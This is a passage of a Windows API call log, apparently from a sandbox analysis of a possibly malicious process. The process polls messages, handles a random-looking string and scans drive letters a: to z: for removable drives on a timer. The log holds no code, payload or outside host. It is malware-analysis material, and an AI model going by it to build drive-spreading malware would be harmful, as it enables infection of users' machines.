wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.701] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0206.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0206.702] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0206.702] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0206.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0206.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0206.702] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.702] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0206.702] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.702] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0206.702] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0206.703] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0206.703] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0206.704] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0206.705] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0206.705] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0206.705] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0206.705] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0206.705] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0206.706] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0206.706] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0206.706] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0206.706] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0206.707] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0206.707] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0206.707] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0206.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0206.707] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0206.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0206.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0206.708] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0206.708] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0206.708] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326100 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.440] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326100 | out: hHeap=0x12c0000) returned 1 [0207.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.440] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0207.440] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0207.440] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0207.441] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0207.441] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0207.441] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0207.441] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0207.441] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0207.441] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0207.441] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0207.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.442] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0207.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0207.442] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0207.442] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0207.442] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0207.442] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.442] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.443] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.443] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0207.443] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.443] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.443] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.444] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.444] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.444] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.444] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.445] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.445] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.445] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.445] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.445] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.446] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.446] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.446] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.446] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.447] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.447] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.447] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.447] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.447] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.448] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.448] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.448] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.448] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.448] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.449] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0207.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0207.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0207.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.449] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0207.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.449] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325dc0 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0207.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325dc0 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.450] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0207.450] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0207.450] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318de0 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.450] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.451] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0207.451] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0207.451] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0207.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0207.451] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0207.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0207.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0207.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0207.452] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0207.452] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0207.452] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0207.452] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0207.452] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0207.453] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0207.453] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0207.453] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0207.453] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0207.453] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0207.454] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0207.454] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0207.454] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0207.455] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0207.456] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0207.456] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0207.456] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0207.456] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0207.457] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0207.457] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0207.457] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0207.457] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0207.457] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0207.457] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0207.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0207.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0207.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0207.458] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0207.458] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326000 [0207.458] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0207.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326000 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0207.459] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0207.459] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0207.459] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0207.459] HeapFree (in: 